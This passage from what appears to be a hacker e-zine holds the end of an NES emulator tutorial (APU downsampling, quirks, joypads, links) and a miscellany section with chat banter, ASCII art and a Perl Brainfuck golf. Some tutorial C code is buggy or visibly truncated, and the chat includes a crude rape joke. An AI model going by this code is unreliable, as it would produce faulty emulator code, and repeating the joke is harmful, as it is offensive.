= pulse_out + tnd_out. The values are normalized, so the values are from 0.0 to 1.0, you need to rescale for your sound API. ========================================================================== ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++Downsampling++++++++++++++++++++++++++++++++++++++++++++++ Since the APU runs the same speed as the NES CPU, it samples ~1789772 samples a second, while a modern sound card can only sample around 44100 samples to 48000 samples, we need to downsample the data. There are many methods that downsamples well to give a decent quality. I'll cover the ones that is most commonly used in emulation. The NES can generate over 20 kHz frequency range, but the human hearing range is around 20 Hz to 20 kHz, so we really don't need any frequency over 20 kHz, and the nyquist sampling theorem tells us that you can reconstruct a signal perfectly when you have twice the amount of sampling rate, thus we theoretically can sample at 40 KHz to cover all the frequency audible by the human hearing range. Sound cards commonly uses 44.1/48 KHz because the extra range gives low pass filters/high pass filters some leeway to work well. To sum up, we really only need to downsample to whatever the sound card can handle. We however need to discard any frequencies above the nyquist limit, so we don't produce aliasing, when a higher frequency waveform gets sampled as into lower frequency waveform, because the sampling rate is too low (this is bad, as the sound would sound wrong.) Nearest Neighbor Interpolation: This is the simplest method you can use, this method is basically taking the "nearest" sample that sums up to the sampling rate you want. For example, the NTSC CPU outputs 1789772 samples a second, while the PAL outputs 1662607 samples a second, and you want to downsample to 44100 Hz, all you need to do is SAMPLING_FREQUENCY/DOWNSAMPLE_RATE. 1789772/44100 = ~41 samples a second and 1662607/44100 = ~38 samples a second. This kind of interpolation is not recommended at all, it discards much data that could affect the wave, and it can produce aliasing. ============Code Example================================================== /* lame NTSC example */ int counter, index; void apu_run() { //get all the unit output and look it up in table... output = pulse_out + tnd_out; //it's a crappy method to begin with, //why even bother with the fractional bit if (++counter == 41) { counter = 0; index = (index + 1) % index_size; sound_buffer[index] = output; //write to sound out using some sound api... } } ========================================================================== Linear Interpolation: This method does a simple average of the samples and outputs it to the buffer, it is a popular form of interpolation for emulation, without too much speed lost. The idea is to accumulate up all the samples up to 40/41 samples, and then divide them by 40 or 41 (NTSC). Linear interpolation works well for the NES, because the wave output doesn't change very often, though with simple averaging, a couple of outliers can effect the average alot. Although linear interpolation doesn't prevent aliasing, because it doesn't filter the higher frequencies out. ===========Code Example=========================================== /* lame NTSC example */ int tmp[41], tmp_index, index; double c = 0.0; void apu_run() { int sample; //get all the unit output... out = pulse_out + tnd_out; tmp[tmp_index++] = out; if (tmp_index == 41) { double fract = 1789772.0/44100; //get the fractional value; fract = fract - floor(fract) + c; if ((fract - 1.0) < 0.00001) fract -= 1.0; tmp_index[40] = tmp[39] * fract + (1.0-fract) * tmp[40]; //handle fract value /* we keep this fractional part for the next output, since the fractional part do get added, like 18.10 + 18.10... will reach a whole number when .10 is added 10 times. */ c = fract; for (int i = 0, i != 41; ++i) { sample += tmp_index[i]; } sample /= 41; sound_buffer[index] = sample; index = (index + 1) % index_size; } /* write samples out to some sound api... */ } ========================================================================== Band Limited Synthesis: Thanks to blargg for coming up with this method, and Disch for explaining it to me. The idea here behind this is to instead take the average every X samples and instead make a buffer that stores the difference of the wave form and write to the buffer when it is changing (When the volume is changed, or when the frequency is changed). This method requires a time index to access when the change took place, and then stores the difference of the new_output - old_output to say how much of the wave has changed (if you did this to every index to where it say it changed, then what you have is at the start, you add up all the change with the old buffer to get the contents of the new buffer. When you add the to the new buffer, you also add in the coefficients of a sinc wave. Blargg wrote about his method in http://slack.net/~ant/bl-synth/, I'll cover here some stuff he didn't go into too specifically. Here is a more clear example with code: /* The index we will use is in a fixed point representation of where it is where sample_rate is the sampling rate we want. First of all we need to calculate transmult, this is done on initialization time. Transmult is a constant that we will multiply with to get it into fixed point representation that allows us to figure out what the index number is of the buffer when we are adding the deltas when the wave changes */ The equation we will use is sample_number = (timestamp * transmult) >> audbits, where audbits is the precision we want. The audbits is a constant we decide to how much "fractional precision" and transmult is a number we calculate to use at the beginning, it is a number we multiply to transform the time index to sample index, covered later */ void calc_transmult(int *transmult, int sample_rate, double cpu_freq) { //the base equation is sample_number = (timestamp * transmult) >> audbits, //solve for transmult and get transmult = (sample_number / timestamp) // << audbits *transmult = sample_rate/cpu_freq * (1<> audbits, //in this case. index = apu.cycle * trans_mult; //we figure out where exactly the fraction part lies. fraction = index >> (audbits - FRACTIONAL_BITS) & ((1<>= audbits; fraction = index //now that we have the index we can index the buffer. //we add the wave samples we generate beforehand when //adding this. assume we have 4 samples point of the //wave we generated here err = output; buf[0] += (wave_table[fraction][0] * output); err -= buf[0]; buf[1] += (wave_table[fraction][1] * output); err -= buf[1]; buf[3] += (wave_table[fraction][3] * output); err -= buf[3]; buf[4] += (wave_table[fraction][4] * output); err -= buf[4]; b[2] += err; //the middle point gets the left over //the wave is distributed, so all //the output adds up to the original //wave. } } ========================================================================== There are other interpolation methods that is very good, such as cubic interpolation, gaussian interpolation that you could check out. Use google or a math book to find some more. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++APU Quirks++++++++++++++++++++++++++++++++++++++++++++ Thanks to blargg for the testing these behaviors. Clock jitter - When the 0x4017 register gets written, the mode change only occurs on even cycles, if it is on an odd cycle, it is delayed by 1 cycle. At power up, the APU is in a random even/odd execution. ============Code Example to handle this=================================== void apu_wr_reg17(struct sNES *nes, u8 data) { nes->apu.doirq = 1; if (data & 0x40) //interrupt inhibit set or mode 1, frame flag cleared { nes->apu.doirq = 0; nes->cpu.irq &= ~FRAME_IRQ_FLG; } //reset frame counter if (nes->apu.cycle & 1) nes->apu.frame_cnt = -2; //odd cycle, delayed by one cycle else nes->apu.frame_cnt = -1; //if mode is 5, clocked in one cycle nes->apu.frame_step = 0; nes->apu.frame_mode = (data & 0x80) >> 7; } ========================================================================== 0x4017 Write: The NES pretends as if 0x4017 was written to just about 9 to 12 cycles before the instruction begins, this causes a delay in the APU clocking the units like the frame counter when it begins. (To implement this, just set your around apu.cycle = -9 and have the state on startup to look like 0x4017 is set) The Frame IRQ: The frame IRQ when clocked by the frame sequencer is set 3 times in a row. so game code that is near edge cases, make sure it is cleared if one wanted it to be cleared. The Length Counter: Length counter halt flag is delayed by 1 cycle. The length reload is ignored if it was written during length clocking and length counter is non-zero before clocking. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -------------------------------------------------------------------------- VI. Miscellaneous ++++++++++++++++++++++++++Joypads+++++++++++++++++++++++++++++++++++++++++ The NES supports a variety of joypads, we'll just cover some commons ones. Here is the standard data stream for the 2 joypad registers, thanks nesdevwiki for the diagram. Addr 7654.3210 Function $4016 (W) ----.---A Output data (strobe) to both controllers. ----.-CBA Output data to the expansion port. $4016 (R) ---4.3--0 Read data from controller port #1. ---4.3210 Read data from expansion port. $4017 (R) ---4.3--0 Read data from controller port #2. ---4.3210 Read data from expansion port. [edit] Famicom Addr 7654.3210 Function $4016 (W) ----.---A Output strobe to both controllers. ----.-CBA Output data to the expansion port. $4016 (R) ----.-M-0 Read data from controller #1 and microphone state from controller #2 ----.--1- Read data from expansion port. $4017 (R) ----.---0 Read data from controller #2. ---4.3210 Read data from expansion port. The standard NES joypad is read from address 0x4016 (1st controller pad), and address 0x4017 (2nd controller pad). Writing 1 (0 bit set) to 0x4016 records the state of the 2 controllers, which buttons are set, writing 0 afterwards to either ports allow readback, 1 bit at a time in the 0th bit of address 0x4016 for controller 1, 0x4017 for controller 2. The first 8 reads returns the button in these order, A, B, Select, Start, Up, Down, Left, Right, after the 8 reads, the port will keep returning 1 (0 bit set) after every read, until the game programmer resets it by writing 1 to the NES joypad again. A Super Nintendo controller can be used on the NES, and it works the same way, but the order of the buttons returned is B, Y, Select, Start, Up, Down, Left, Right, A, X, L, R. 0x4016 and 0x4017 bit can be shifted by 1 by the DMC channel, documented above. You should handle these the joypad events when 0x4016 gets written to with 0th bit set. There is also one thing you need to take in account, on a real controller, the up/down button and left/right button *CANNOT* be used simutaneously, for an emulator this isn't a problem. You need to filter the simutaneous press of up/down and left/right in your code, only allowing up or down at one time, or left and right at one time. Some games will assume that since you can't do that in the controller, they wrote code that assumed that behavior, some games will break if you don't implement the filtering of the button presses. Usually the joypad returns that bit ORed with 0x40, because of open bus, so when the game reads from 0x4016 or 0x4017 do return data | 0x40; The NES Four Score and NES Satellite accessories allow four NES controllers to be hooked up together. It works the same as the standard controller, writing 1 to record the state of the controllers, and reading back returns 1 bit (0th bit) of data at a time to see if which button is pressed. Read 8 times in 0x4016 for all of the controller #1 data, 8 times again for controller #3, then read 8 times for the signature 0x10. Read 8 times in 0x4017 for the controller #2 data, 8 times for controller #4, and 8 more times to get the signature, 0x20. Button status for each controller is returned in the following order: A, B, Select, Start, Up, Down, Left, Right. 1 if pressed, 0 if not pressed. Controllers #3, #4, and the two signatures are only sent when the Four Score switch is in the 4 player position. When the switch is in the 2 player position those reads get the same result as a normal controller, either 0x00 or 0xFF depending on the controller. The Zapper is a light gun that Nintendo sold for shooting games such as Duck Hunt, the gun can be used in either port. Bit 3 of register 0x4016 or 0x4017 reads back 1 if the light sense is detected, 0 if it is not. The light sense is used to see if the gun is pointed at the screen, it is up to the game programmer to check this, you just need to set it to 1 (not detected, says the gun is pointed at the screen) whenever some keyboard mapping you give the gun gets hit. It also uses bit 4 for the trigger released or not, 1 if pulled, 0 is released. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++Links++++++++++++++++++++++++++++++++++++++++++++++ http://nesdevwiki.org/ The latest up to date information about the NES, look here to learn more about the NES, along with the hardware. http://www.6502.org/tutorials/6502opcodes.html This site shows all the official opcodes of the 6502 and their behaviors, a very nice resource for what implementing the CPU opcodes. http://www.viceteam.org/plain/64doc.txt This shows what the CPU does per cycle when it is accessing the opcodes, this is a must for anyone who wants to get their timing properly. http://nesdev.parodius.com/ The site where the original documents were stored, note that some documents hosted there are outdated, and found to be wrong now. http://nesdev.parodius.com/bbs/ A great forum to talk about the NES, this is where the latest and greatest hacks/discovery/discussion about the NES takes place. It is a good place to learn about the NES hardware. http://www.romhacking.net/docs/%5B362%5Dmapper_docs.zip Disch compiled over 100 mappers documentation into 1 zip file, for those who wants to be play more games, implementing mappers is a must. http://www.qmtpro.com/~nes/nintendulator/ Nintendulator is an emulator made by Quietust, this emulator is per cycle accurate code, with much more mappers supported not documented in any documents. Give this a read to learn more about the NES. http://nestopia.sourceforge.net/ Nestopia is also a per cycle accurate code, with a very well designed structure, give this a read to learn more about the NES too. http://www.slack.net/~ant/nes-tests/ Blargg's test ROMs, they are designed to be used when writing the emulator, his test ROMs cover a wide range of obscure behavior of the PPU and APU, and even CPU timing. A must for anyone who is writing a NES emulator. http://www.qmtpro.com/~nes/misc/nestest.nes http://www.qmtpro.com/~nes/misc/nestest.txt This is a CPU rom test by Kevin Horton (kevtris), this is also a good test rom for anyone who is writing a NES emulator. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++Summary++++++++++++++++++++++++++++++++++++++++++++++ To sum it all up, we'll describe how a normal game works. When the cartridge PRG-ROM gets mapped to the memory space 0x8000 to 0xFFFF. The address it jumps to begin decoding instruction is the RESET vector, the game first thing it should do is disable all interrupts with SEI, then it sets all the memory addresses it will use to 0, after which it waits for the NES to enter VBLANK, where it will start writing tile data or CHR data (if it uses CHR-RAM) for what to draw, then it enable rendering, and off the NES goes to render the screen. The game main loop is in, they can write to the music port to change the output, do graphic updates and joypad reading during NMI. There are some games that was written by people who knew the NES inside out, they write to the graphics *during* rendering or take advantage to some cycle behavior, or how the NES works, so you must take that into account if you decide to write one. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ VII. Thanks Thanks to the Disch for proof reading this and for helping me when I was writing the emulator, also to Vystrix_Nexoth for proof reading this. To Quietust for making the emulator Nintendulator, which helped me understand how the NES worked, blargg and kevtris for writing test ROMs, and reversed engineered so much of the NES, the rest of the NESDEV community for reverse engineering the NES/writing documents which I learned so much from when I started, helpful comments, and the NESDEV wiki that they contributed to, which I used as a reference when I was writing this, and to the people who made 64doc.txt for documenting per cycle operation code for the 6502. Thanks for reading. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -------------------------------------------------------------------------- [==============================================================================] [-------------------------------[ /dev/random ]--------------------------------] [==============================================================================] but. yeah. y'know. i think you have to be fairly well circulated before your institution will put up with that kinda shit :) I'M TOO SEXY FOR MY CAT TOO SEXY FOR MY CAT TOO SEXY FOR MY CAT TOO SEXY FOR MY CAT TOO SEXY FOR MY CAT TOO SEXY FOR MY CAT TOO SEXY FOR MY CAT okay. yea. * sam blinks sorry It's good now I'm good * sam nods right said fred just got me it's.. fair enough. he does that from time to time in his frightening 80's string vest yea ... dude. I don't even OWN a cat. you wouldn't STEAL a cat. you wouldn't go to the TOILET in the stolen cat! EXACTLY. but you would rape cats! but so would FRED. "rape said fred" _____ "RAPE." | | / |##-##|) / Fred -----> | ( |' / \ O / |\___/| ___ ____/: :\____ ___ .' `.-===-\ /-===-.` '. / .-"""""-.-"""""-. \ /' =:= '\ .' ' .: o -=:=- o :. ' `. (.' /'. '-.....-'-.....-' .'\ '.) /' ._/ ". --:-- ." \_. '\ | .'| ". ---:--- ." |'. | | : | | ---:--- | | : | \ : | | . | | : / \ ( | ' | ) \ \.\ | " | /./ (...\ / """ \ /...) **** / """ \ **** / (__"\ \ | / \ \ | | / (.) | ====================================================== ]BRAINFUCK GOLF[ ===== #!/usr/bin/perl -0n $i-=%h=qw/< ++$i > --$i + ++$$i - --$$i [ while($$i){ ] } . print+chr$$i , $$i=getc/;s/./$h{$&};/g;eval ============================================================================= http://wwwwwwwww.jodi.org/100cc/index.html /\ / \ / \ _________________/______\_________________ | : ||: ~ ~ : | | : ||: : | | : ||: : | | : ||: : | | : ||: : | | : ||: : | | : ||: : | | : ||: : | | : ||: : | | : ||: : | | : ||: : | | : ||: : | | :______||:_____________________________: | |/_______||/______________________________\| \ ~\ | : |:| / \ |\ | : |:| / \ | \ | :__________|:| / \ |:_\ | :__________\:| / \ |___\ |______________| / \ | \ |~ \ / \|_______\|_________________\_/ |_____________________________| / \ / \ / \ / _______________ \ / ___/ \___ \ /____ __/ \__ ____\ |____/ \ ___| / __/ \__ \ / / \ \ / / ___________ \ \ / / __/___________\__ \ \ / /__ ___ /=================\ ___ __\ \ / /___||___|====|[[[[[|||||||]]]]]|====|___||___\ \ / / |=o=o=o=o=o=o=o=o=| \ \ .' / \_______ _______/ \ `. : |___ |*| ___| : .' | \_________________ |*| _________________/ | `. : | ___________ ___ \ |*| / ___ ___________ | : : |__/ \ / \_\\*//_/ \ / \__| : : |______________:|:____:: **::****:|:********\_________: .' /:|||||||||||||'`|;..:::::::::::..;|'`|||||||*|||||:\ `. : \:|||||||||||' .:::;~|~~~___~~~|~;:::. `|||||*|||||:| : : |:|||||||||' .::'\ ..:::::::::::.. /`::. `|||*|||||:| : : |:|||||||' .::' .:::''~~ ~~``:::. `::. `|\***\|:| : : |:|||||' .::\ .::''\ | | /``::: /::. `|||*|:| : : |:|||| ::' .::' \|_________|/ `::: `::. `|* :| : `. \:||' .::' ::'\ . . . /::: `::. *|:/ .' : \:' :::'.::' \ . . / `::.`::: *:/ : : | .::'.::'____\ . /____`::.`::.*| : : | :::~::: | . . . | :::~:::*| : : | ::: :: | . . ..:.. . . | :: :::*| : : \ ::: :: | . : | :: :::*/ : `. \`:: ::: ____| . . . |____ ::: ::'/ .' : \:;~`::. / . . \ .::'~::/ : `. \:. `::. / . . . \ .::' .:/ .' : \:. `:::/ _________ \:::' .:/ : `. \::. `:::. /| |\ .:::' .::/ .' : ~~\:/ `:::./ | | \.:::' \:/~~ : `:=========\::. `::::... ...::::' .::/=========:' `: ~\::./ ```:::::::::''' \.::/~ :' `. ~~~~~~\| ~~~ |/~~~~~~ .' `. \:::...:::/ .' `. ~~~~~~~~~ .' `. .' `:. .:' `::. .::' `::.. ..::' `:::.. ..:::' `::::::... ..::::::' `:____:::::::::::____:' ```::::_____::::''' ~~~~~ _ _ _ _ _____ _____ _ _ _ _| |_| |_ (_)_ _ __ _ | |_ __ _ ___ / -_) V / -_) '_| || | _| ' \| | ' \/ _` | | ' \/ _` (_-< \___|\_/\___|_| \_, |\__|_||_|_|_||_\__, | |_||_\__,_/__/ _ _ |__/ _ |___/ _ (_) |_ ___ | |_(_)_ __ ___ __ _ _ _ __| | | | _(_-< | _| | ' \/ -_)_ / _` | ' \/ _` | |_|\__/__/ \__|_|_|_|_\___( ) \__,_|_||_\__,_| _ _ _ |/ _ _ _____ _____ _ _ _ _| |_| |_ (_)_ _ __ _ __| (_)___ ___ / -_) V / -_) '_| || | _| ' \| | ' \/ _` | / _` | / -_|_-<_ \___|\_/\___|_| \_, |\__|_||_|_|_||_\__, | \__,_|_\___/__(_) |__/ |___/ __________ ___________ ____ =IZDD87,,,,,,,,,O7~,,,,,,,,,,,,,,,,,IOO ?7 7DDD~:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?8DDDDDD8O~ 88,,,8DD:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,+D8? =8?,,,,8,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,OD, D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ID+ O,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,+8 D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ND D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,~D Z,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,8 D,,,,,,,,,,=:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D Z8,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,N,,,,,,,,,,,,,,,,,,,,,D ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,:+,,,,,,,,,,,,,,,,,$ ,,,,,,,,,,,,,8,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,+ ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,,,,,,,,,,,,,,,,,,,,,,,,,,, :,,,~ ,,,,:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ZDDDDDD8~,,,,,,,,,,,,,,,I:,,,,,,,,,,,,,,,,,: ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,$,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=$,,,,= =,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?:,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D D,~=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,7D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D 7O,,8:,,,8,,,,?DDD$~,,,,,,,,,,,,:OD8O$I+:,,,,,,,,$,:,,,,,,,,,,,,,,,,,,,,,,,,,,DD ?D=,~D,,,,DO+,,,,,,,~88D,,,,,,,,,,,,,,,,,,,,,,,,ZDDO~,,,,,8DDI,,,ODDD,,,,,:DD7 OD?D,,,,,,,,,,:=IZDDDD,,,,,,,,,,,,,,,,,,,,,,DDDO7ZDDDD:,,:DD+,,,=,,,,,DDD 8$,,,,,,,,,,,,,~$DD7,,,,,,,,,,,,,,,,,,,,,$D,,,,,,,+$?,,,,,,,,,,,,,=D8 +DI,,,~,,,,~IZO8D~O,,,,,~,,,,,,,,,,,,:,ODZ:,,,,,,,,,,,,,,$,,,,~8DI 88=,,,8D7,,,DD,,,,,,,?,O,,,,,,,,,,7,DD+:,,,,,,D7,,,,,,,,$DDDD =7OO88DD,,,,,,,Z,,,,,,,,,:,,D,DD+,,~$D8:,,,,,,,,,,,,OI D,,,,,,,D,,,,,+,,,,?,D,DD= ?DI~,,:=I$DDD D,:,,,,,D,,,,,D,,,,,,D,DD D,=,,,,,D,,,I,D,,,,,,D,DD D,,,,,,,D~,,,,?:,,,,,I=DD D,,,,,,,DZ,,,,,D?,,,,:DDD D,,,:,,8DD,,,,,DD+,,,,DDD D,,~:,+D8,,7,,,,D7,,,,$DD D=,?,,ZD$,,D,,,,DZ,,,,=DD D7,O,,?DD,,D,,,,DD,,D,:DD DD,D,,:DD,,D7,,,7D=,D,,DD7 DD,D,,,DD,,$8,,,~DDDD?,DDD DD=D,,,DDI,,D,,,,DDDDD,DDD 7DDDD,,,DDD,,D:,O,DDDDD,DDD,,,, DDDDDZ,,DDD,,DD,DODDDDD+DDDD,,,,,, ,DDDDDD,,DDDD,DDD+DDDDDDDDDDD~,,,,,,, ,,,,DDDDDDDDDDDDDDDDDDDDDDDDDDDDD,,,,,,,,, ,,,,=DDDDDDDDDDDDDDDDDDDDDDDDDDDDDI,,,,,,,,, ,,,,,DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD,,,,,,,,, ,,,,,:DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?,,,,,,,, ,,,=+,DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD~,,,,,,, =DD~,,+DD8,,:DD$,,,:=?I7$ZO888888888OOOOOO8DDD$~O8, D,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,87 D7,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,IO +D,,,,,,,,,,,~,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,:+,,,,,,8 ZDD,,,,,DDDDDDDDDDDD+,~,,,,,,,,,:+I$ODDDDDD+,?D8,,,,8 ,,DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?,,:8D: ,ODDDDDN=8DDDDDDD,ZDDDDD7?I8DDDDDD,,,D ,,DDDDDDD ,,,, 8ZI8I,,,,7DDDDDD:,,?,,DDD,,,,~D=ZDDD,,,$+,,DDDDDDD8~,, ~D$?I,,,,,,ZDDDDDD:,,,,,,D,,,,,,,:D,,8DD,,,,,,,?8DD+DDDD :D$,,,:O,,,,,OZ8DDDD+,,8,,,=~,,,,,,,,,,,,,O8,,,,,,,,,88,,DDDD+ $D7,,,,,I,,,,,,,,DDDDD?,,,,,,,?,,,,,,,,,,,,,,,,8,,,,,,,,,,7,,8DDDDD= ,ZDDDDDDDDDDDDDD888OOOOOZZ$$$$7777IIIII?????+++++==~~~~~:::::::,,:DDDDDDD8: mov al,3 ; .aware cr3w restores video m0de - - = ==== = === =] int 10h ; - = = = = ==== ======= === ======= = ======== =] [================================= . . . as a last ditch effort. ==============]